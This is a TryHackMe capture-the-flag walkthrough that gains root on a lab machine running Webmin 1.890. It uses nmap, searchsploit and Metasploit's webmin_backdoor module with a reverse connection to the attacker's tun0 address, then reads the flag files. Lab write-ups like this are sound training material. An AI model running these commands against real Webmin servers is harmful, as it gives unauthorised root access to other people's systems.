TryHackMe: Source Writeup
In the “Source” box on TryHackMe, participants are challenged to exploit a recent vulnerability in Webmin, a widely-used web-based interface for system administration.
To access the box click on the following link and join room.
Check connection
Ping machine IP to check if the connection is established. In my case ping is successful so the connection is established.
Scanning
Let’s start with a nmap scan. Use following command to scan the target IP address.
nmap -sV -sC -Pn 10.10.136.187The above command instructs Nmap to scan the host at IP address 10.10.136.187, skipping host discovery, using script scanning with default scripts, and attempting to determine the version of the services running on detected open ports.
nmapInvokes Nmap, which stands for Network Mapper.-sVEnables version detection, allowing Nmap to determine the version numbers of the services running on open ports.-sCEnables the script scanning using the default set of scripts. It's useful for detecting additional information and vulnerabilities in the target system.-PnTells Nmap to skip the discovery phase and treat all hosts as online. This is useful when scanning targets that block ping probes.10.10.136.187IP address of the target system.
The scan results shows that port 22 and port 10000 are open. Port 10000 is serving as a host for Miniserv version 1.890, a web server commonly associated with the Webmin administration interface.
Search for exploit
Let’s search the webmin 1.890 on searchsploit (Exploit Database Repository) to check if any exploit is available for this particular service. Use the following command to search for exploit.
searchsploit webmin 1.890
Metasploit
Let’s start Metasploit by using command msfconsole
Once the console is initialized let’s use search webmincommand to find exploit for webmin service.
Out of all the search results webmin_backdoor seems right with the rank excellent. Let’s use this by typing command use 7.
Used command optionsto check the available options to utilize this exploit.
Setting LHOST
LHOST (Local Host) Refers to the IP address of the attacker's machine. It is the host on which the Metasploit framework is running and typically the machine to which the exploited system will connect back (e.g., for a reverse shell). LHOST is used to specify where the payload will send its connection or where to listen for incoming connections in the case of a reverse connection.
To set LHOST we can use the following command in msfconsole.
set LHOST tun0
Setting RHOST
RHOST (Remote Host) Refers to the IP address of the target or victim's machine. It is the host that the attacker aims to exploit or scan. RHOST is used to specify the destination address for the exploit or scan being performed.
To set RHOST we can use the following command in msfconsole.
set RHOSTS 10.10.177.55
Exploiting target
Now to execute the configured exploit against the specified RHOST Let’ use exploit command in msfconsole. This command will initiate the attack, and if successful, it may provide us with access to the target system and BOOOM we are in!!!.
Let’s type id command to check the info of user.
Get root flag
The result of id command shows that we are logged in as root user so let’s check what is present in /root directory of target machine. We can simply do this by using command ls /root
and we have our desired root.txtroot.txt file. Let’s use the following command to capture our root flag.
cat /root/root.txt
Get user flag
Now, Let’s check /home directory to see which users are present in home directory. We can simply check that by displaying contents of /home directory with the ls /home command.
and we have a user named dark in home directory. So let’s use ls /home/dark command to check what is dark hiding.
and we have our desired user.txt file. Let’s use the following command to capture our user flag.
cat /home/dark/user.txt
Copy and paste your flags on tryhackme.
CONGRATULATIONS!!! The room is completed!
This walkthrough finishes here. Stay tuned for the next adventure! 🚀😊
